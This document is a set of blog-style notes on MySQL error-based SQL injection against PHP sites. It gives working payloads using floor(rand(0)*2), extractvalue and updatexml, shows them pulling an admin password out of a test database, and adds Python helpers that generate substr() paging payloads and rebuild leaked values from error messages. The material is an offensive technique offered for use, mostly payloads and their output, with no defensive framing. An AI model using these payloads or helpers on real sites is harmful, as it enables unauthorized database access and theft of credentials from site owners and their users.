Posting some old notes. When MySQL executes a statement it raises an error message, and PHP+MySQL sites often print that error text straight onto the page, so with the three constructions below specific data can be pulled out through the error itself.
Test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Triggering an error via floor()

Payloads such as the following can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));

Both rely on the same quirk: GROUP BY evaluates its key expression once to look the row up in the temporary table and again when it inserts the row, and rand(0) is seeded, so floor(rand(0)*2) always yields 0,1,1,0,1,1,... By the third row the key being inserted already exists and MySQL raises "Duplicate entry", with whatever was concatenated in front of the digit printed in the message. That is why the derived table must have at least three rows: information_schema.tables always has plenty, and the union in the second payload (1, NULL, !1) supplies exactly three.
Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked through the error message (the trailing 1 is the floor(rand(0)*2) digit, not part of the version string). To fetch other data, replace version() with a subquery for the value you want.
For example, to query the administrator's username and password (the statements below fetch pass; user is fetched the same way):

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
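Added example (Python, not from the original notes): a model of why the floor(rand(0)*2) trick errors out. The generator reimplements MySQL's RAND(seed) as I know it from the server source (seeding in sql/item_func.cc, my_rnd() in mysys/my_rnd.c; assumption: the build you test against has not changed it), and the GROUP BY model only keeps the part that matters, the double evaluation of the key. The version string prefix is taken from the error above.

```python
from typing import Iterator, List, Optional


def mysql_rand(seed: int = 0) -> Iterator[float]:
    """Reproduce MySQL's RAND(seed) sequence (30-bit linear congruential generator).

    Seeding: seed1 = seed*0x10001 + 55555555, seed2 = seed*0x10000001 (as uint32),
    both reduced modulo 0x3FFFFFFF.  Assumption: matches the server you test.
    """
    max_value = 0x3FFFFFFF
    seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % max_value
    seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % max_value
    while True:
        seed1 = (seed1 * 3 + seed2) % max_value
        seed2 = (seed1 + seed2 + 33) % max_value
        yield seed1 / max_value


def floor_rand_bits(n: int, seed: int = 0) -> List[int]:
    """First n values of floor(rand(seed)*2), i.e. the digit appended to the group key."""
    gen = mysql_rand(seed)
    return [int(next(gen) * 2) for _ in range(n)]   # int() == floor() on [0, 2)


def group_by_duplicate(row_count: int,
                       prefix: str = "5.1.33-community-log") -> Optional[str]:
    """Model MySQL's GROUP BY on a non-deterministic key expression.

    For every source row the key is evaluated once to look it up in the
    temporary table; if it is absent, the key is evaluated AGAIN when the
    row is inserted.  With rand(0) the digit sequence is 0,1,1,0,1,1,...:
      row 1 looks up '...0' (absent), inserts '...1'
      row 2 looks up '...1' (present), just counts it
      row 3 looks up '...0' (absent), tries to insert '...1' -> already there
    Returns the key that collides (the text of ERROR 1062), or None if the
    source table is too small for the collision to happen.
    """
    gen = mysql_rand(0)
    tmp_table = {}
    for _ in range(row_count):
        key = prefix + str(int(next(gen) * 2))   # evaluation for the lookup
        if key in tmp_table:
            tmp_table[key] += 1
            continue
        key = prefix + str(int(next(gen) * 2))   # re-evaluated on insert
        if key in tmp_table:
            return key                           # duplicate-key error fires here
        tmp_table[key] = 1
    return None


if __name__ == "__main__":
    print(floor_rand_bits(6))          # [0, 1, 1, 0, 1, 1]
    print(group_by_duplicate(2))       # None: two rows are not enough
    print(group_by_duplicate(3))       # 5.1.33-community-log1
```

Running it with two rows returns None, which is the reason the second payload in the notes unions three rows together rather than two; with three rows the collision key comes out exactly as the server prints it in the Duplicate entry message.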
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

The 0x5c ('\') in front of the value is what makes the string invalid XPath, so the server complains and echoes it. extractvalue() and updatexml() exist from MySQL 5.1.5 on, and the XPath error only echoes the first 32 characters of the offending string (delimiter included), so a longer value has to be read in pieces with substr(). The same limit applies to updatexml() below.
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

Here 0x5e24 is '^$', placed on both sides of the value so that it is easy to pick out of the page.
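Added example (Python, not from the original notes): a helper that parses the leaked value back out of the three error shapes shown in these notes, plus the substr() paging needed once a value is longer than the 32-character XPATH error window. The error lines and the 40-character secret are constructed for the demo, and the target is stood in for by a function that applies the same "%.32s" truncation the server does, so everything runs offline.

```python
import re
from typing import List, Optional

# "Duplicate entry '<value><0|1>' for key 'group_key'": drop the floor(rand(0)*2) digit
FLOOR_RE = re.compile(r"Duplicate entry '(.*)[01]' for key 'group_key'")
# "XPATH syntax error: '<delim><value>[<delim>]'": extractvalue() and updatexml()
XPATH_RE = re.compile(r"XPATH syntax error: '(.*)'")

XPATH_WINDOW = 32      # MySQL prints the offending XPath string with %.32s
DELIM = "\\"           # 0x5c, as in the extractvalue payload above


def leaked_value(error_line: str, delim: str = "") -> Optional[str]:
    """Return the injected value carried by one MySQL error message, or None."""
    m = FLOOR_RE.search(error_line)
    if m:
        return m.group(1)
    m = XPATH_RE.search(error_line)
    if not m:
        return None
    body = m.group(1)
    if delim and body.startswith(delim):
        body = body[len(delim):]
    if delim and body.endswith(delim):          # updatexml payload wraps both ends
        body = body[:-len(delim)]
    return body


def substr_payload(column_query: str, offset: int) -> str:
    """extractvalue payload for one page of the value; offset is 1-based like SQL substr()."""
    width = XPATH_WINDOW - len(DELIM)           # 31 usable characters per error
    return (f"and extractvalue(1, concat(0x5c, substr(({column_query}), "
            f"{offset}, {width})))")


def simulate_xpath_error(injected: str) -> str:
    """Constructed stand-in for the server: the error text, truncated to 32 chars."""
    return f"ERROR 1105 (HY000): XPATH syntax error: '{injected[:XPATH_WINDOW]}'"


def page_through(secret: str) -> List[str]:
    """Constructed stand-in for the target: the error each substr() page would raise.
    In real use this loop sends substr_payload(...) over HTTP instead."""
    width = XPATH_WINDOW - len(DELIM)
    pages, offset = [], 1
    while True:
        chunk = secret[offset - 1: offset - 1 + width]   # what substr(secret, offset, width) returns
        pages.append(simulate_xpath_error(DELIM + chunk))
        if len(chunk) < width:                           # short page: end of the value
            return pages
        offset += width


def reassemble(error_pages: List[str]) -> str:
    """Join the per-page values; the first page shorter than a full window ends the value."""
    width = XPATH_WINDOW - len(DELIM)
    out = []
    for line in error_pages:
        chunk = leaked_value(line, DELIM)
        if chunk is None:
            break
        out.append(chunk)
        if len(chunk) < width:
            break
    return "".join(out)


if __name__ == "__main__":
    secret = "0123456789abcdef0123456789abcdef01234567"   # constructed 40-char value
    print(leaked_value(simulate_xpath_error(DELIM + secret), DELIM))  # only 31 chars survive
    print(substr_payload("select pass from admin limit 1", 32))
    print(reassemble(page_through(secret)) == secret)               # True
```

The single-shot payload from the notes is enough for short values like admin888; the paging loop is what you need as soon as the target column is a hash or a long table name, because the server silently cuts the echoed string at 32 characters and a naive reading would look complete.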
That's all. Thanks to the foreign guys.